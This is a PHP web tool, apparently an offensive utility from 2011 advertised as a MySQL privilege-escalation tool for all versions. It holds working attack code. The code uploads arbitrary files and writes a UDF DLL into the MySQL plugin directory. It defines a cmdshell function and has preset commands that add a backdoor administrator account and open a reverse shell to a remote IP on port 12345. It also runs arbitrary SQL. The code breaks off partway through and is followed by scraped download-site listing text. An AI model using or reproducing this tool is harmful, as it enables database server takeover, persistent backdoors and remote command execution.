<?php
if (get_magic_quotes_gpc()) {
function stripslashes_deep($value)
{
$value = is_array($value) ?
array_map('stripslashes_deep', $value) :
stripslashes($value);
return $value;
}
$_POST = array_map('stripslashes_deep', $_POST);
$_GET = array_map('stripslashes_deep', $_GET);
$_COOKIE = array_map('stripslashes_deep', $_COOKIE);
$_REQUEST = array_map('stripslashes_deep', $_REQUEST);
}
session_start();
if($_GET['action']=='logout'){
foreach($_COOKIE["connect"] as $key=>$value){
setcookie("connect[$key]","",time()-1);
}
header("Location:".$_SERVER["SCRIPT_NAME"]);
}
if(!empty($_POST['submit'])){
setcookie("connect");
setcookie("connect[host]",$_POST['host']);
setcookie("connect[name]",$_POST['name']);
setcookie("connect[pass]",$_POST['pass']);
setcookie("connect[dbname]",$_POST['dbname']);
echo "<script>location.href='?action=connect'</script>";
}
/*
foreach($_COOKIE["connect"] as $key=>$value){
echo $key.":".$value."<br>";
}
*/
if(empty($_GET["action"])){
?>
<form name="form1" method="post" action="?action=connect">
<div align="center">
<table width="294" height="140" border="1" cellpadding="1" cellspacing="5">
<caption>
<h5>基友菊花爆必备神器->MYSQL高版本提权工具</h5>
</caption>
<tr>
<td width="66">host:</td>
<td width="270"><input name="host" type="text" id="host" size="34"></td>
</tr>
<tr>
<td>name:</td>
<td><input name="name" type="text" id="name" size="34"></td>
</tr>
<tr>
<td>pass:</td>
<td><input name="pass" type="text" id="pass" size="34"></td>
</tr>
<tr>
<td>dbname:</td>
<td><input name="dbname" type="text" id="dbname" size="34"></td>
</tr>
<tr>
<td colspan="2"><div align="center">
<input type="submit" name="submit" value="提交">
<input type="reset" name="Submit" value="重置">
</div></td>
</tr>
</table>
</div>
</form>
<div align="center"><strong>Copyright By Dark'mOon 2011</strong><br>
Blog:<a href="http://www.moonhack.org" target="_blank">www.moonhack.org</a> Bbs:<a href="http://www.90sec.org" target="_blank">www.90sec.org</a>
<a href="http://www.moonhack.org" target="_blank">版本更新</a>
</div>
<?php
exit;
}
$link=@mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["name"],$_COOKIE["connect"]["pass"]);
if(!$link){
echo "连接失败.".mysql_error()."<a href='javascript:history.back()'>返回重填</a></script>";
exit;
}else{
echo "连接成功<br>";
$str=mysql_get_server_info();
echo 'MYSQL版本:'.$str."<br>";
echo "<hr>";
if($str[2]>=1){
$sql="SHOW VARIABLES LIKE '%plugin_dir%'";
$row=mysql_query($sql);
$rows=mysql_fetch_row($row);
$pa=str_replace('\\','/',$rows[1]);
$path=$_SESSION['path']=$pa."/moonudf.dll";
}else{
$path=$_SESSION['path']='C:/WINDOWS/moonudf.dll';
}
}
$conn=mysql_select_db($_COOKIE["connect"]["dbname"],$link);
if(!$conn){
echo "数据不存在.".mysql_error()."<a href='javascript:history.back()'>返回重填</a></script>";
exit;
}else{
echo "数据库--".$_COOKIE['connect']['dbname']."--存在<br>";
}
echo '<a href="?action=logout">点击退出</a>';
echo '<form action="" method="post" enctype="multipart/form-data" name="form1">';
echo '<table width="297" height="53" border="1">';
echo '<tr>';
echo '<td colspan="2">当前路径:';
echo "<input name='p' type='text' size='27' value='".dirname(__FILE__)."\'></td>";
echo '</tr>';
echo '<tr>';
echo '<td width="235"><input type="file" name="file"></td>';
echo '<td width="46"><input type="submit" name="subfile" value="上传文件"></td>';
echo '</tr>';
echo '</table>';
echo'</form>';
if($_POST['subfile']){
$upfile=$_POST['p'].$_FILES['file']['name'];
if(is_uploaded_file($_FILES['file']['tmp_name']))
{
if(!move_uploaded_file($_FILES['file']['tmp_name'],$upfile)){
echo '上传失败';
}else{
echo '上传成功,路径为'.$upfile;
}
}
}
echo '<hr>';
echo '<form action="?action=dll" method="post"/>';
echo '<table cellpadding="1" cellspacing="2">';
echo '<tr><td>路径目录为</td></tr>';
echo "<tr><td><input type='text' name='dll' size='40' value='$path'/></td>";
echo '<td><input type="submit" name="subudf" value="导出udf"/></td></tr>';
echo '</table>';
echo '</form>';
echo '<hr>';
if($_POST['subudf']){
mysql_query('DROP TABLE Temp_udf');
$query=mysql_query('CREATE TABLE Temp_udf(udf BLOB);');
if(!$query){
echo '创建临时表Temp_udf失败请查看失败内容'.mysql_error();
}else{
$shellcode=udfcode();
$query="INSERT into Temp_udf values (CONVERT($shellcode,CHAR));";
if(!mysql_query($query)){
echo 'udf插入失败请查看失败内容'.mysql_error();
}else{
$query="SELECT udf FROM Temp_udf INTO DUMPFILE '".$path."';" ;
if(!mysql_query($query)){
echo 'udf导出失败请查看失败内容'.mysql_error();
}else{
mysql_query('DROP TABLE Temp_udf');
echo '导出成功';
}
}
}
}
echo '<form name="form2" method="post" action="">';
echo '<table width="300" height="59" border="1.2" cellpadding="0" cellspacing="1">';
echo '<tr>';
echo '<td width="83">文件路径:</td>';
echo '<td width="201"><input name="diy" type="text" id="diy" size="27"></td>';
echo '</tr>';
echo '<tr>';
echo '<td>目标路径:</td>';
echo '<td><input name="diypath" type="text" id="diypath" size="27" value="C:/WINDOWS/diy.dll"></td>';
echo '</tr>';
echo '<tr>';
echo '<td colspan="2">';
echo '<div align="right">';
echo '<input type="submit" name="Submit2" value="自定义导出">';
echo '</div></td></tr>';
echo '</table>';
echo '</form>';
if(!empty($_POST['diy'])){
$diy=str_replace('\\','/',$_POST['diy']);
$diypath=str_replace('\\','/',$_POST['diypath']);
mysql_query('DROP TABLE diy_dll');
$s='create table diy_dll (cmd LONGBLOB)';
if(!mysql_query($s)){
echo '创建diy_dll表失败'.mysql_error();
}else{
$s="insert into diy_dll (cmd) values (hex(load_file('$diy')))";
if(!mysql_query($s)){
echo "插入自定义文件失败".mysql_error();
}else{
$s="SELECT unhex(cmd) FROM diy_dll INTO DUMPFILE '$diypath'";
if(!mysql_query($s)){
echo "导出自定义dll出错".mysql_error();
}else{
mysql_query('DROP TABLE diy_dll');
echo "成功出自定义dll<br>";
}
}
}
}
echo "<hr>";
echo '自带命令:<br>';
echo '<form action="" method="post">';
echo '<select name="mysql">';
echo '<option value="create function cmdshell returns string soname \'moonudf.dll\'">创建cmdshell</option>';
echo '<option value="select cmdshell(\'net user $darkmoon 123456 /add & net localgroup administrators $darkmoon /add\')">添加超级管理员</option>';
echo '<option value="select cmdshell(\'net user\')">查看用户</option>';
echo '<option value="select cmdshell(\'netstat -an\')">查看端口</option>';
echo '<option value="select name from mysql.func">查看创建函数</option>';
echo '<option value="delete from mysql.func where name=\'cmdshell\'">删除cmdshell</option>';
echo '<option value="create function backshell returns string soname \'moonudf.dll\'">创建反弹函数</option>';
echo '<option value="select backshell(\''.$_SERVER["REMOTE_ADDR"].'\',12345)">执行反弹</option>';
echo '<option value="delete from mysql.func where name=\'backshell\'">删除backshell</option>';
echo '</select>';
echo '<input type="submit" value="提交" />';
echo '</form>';
echo '<form action="?action=sql" method="post">';
echo '自定义SQL语句:<br>';
echo '<textarea name="mysql" cols="40" rows="6"></textarea>';
echo '<input type="submit" value="执行" />';
echo '</form>';
echo "回显结果:<br>";
echo '<textarea cols="50" rows="10" id="contactus" name="contactus">';
if(!empty($_POST['mysql'])){
echo "SQL语句:".$sql=$_POST['mysql']."\r\n";
$sql=mysql_query($sql) or die(mysql_error());
while($rows=@mysql_fetch_row($sql)){
foreach($rows as $value){
echo $value;
}
}
}
echo '</textarea><br>';
echo '<hr>';
print("
功能�
暗月mysql全版本通杀提权
2星 需积分: 50 79 浏览量
2017-06-21
19:15:04
上传
评论 2
收藏 79KB ZIP 举报
shisongsong
- 粉丝: 2
- 资源: 8
最新资源
- SRS-CentOS7-x86-64-5.0-r1.zip
- 全文检索使用ElasticSearch实现全文检索的详细说明和实践探索
- Python《基于TensorFlow的人脸识别(面部表情识别)卷积神经网络 》+源代码+文档说明
- Python《利用bert预训练的中文模型进行文本分类 数据集中文情感分析语料》+源代码+文档说明
- Keil MDK主题美化和代码美化
- 《单片机PID算法的恒温控制系统仿真与程序源码设计(DS18B20传感器) 》+源代码
- 基于matlab小波变换图像压缩系统代码15
- 基于matlab主成分分析图像压缩重建系统代码14
- C语言《基于AT89C52单片机搭建的PID直流电机控制程序,主要用于Proteus电路仿真》+源代码
- C++《基于规划和汽车动力学的自动驾驶项目仿真(基于ROS的自动驾驶项目仿真,使用DWA路径规划算法和双PID控制器)》+源代码
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈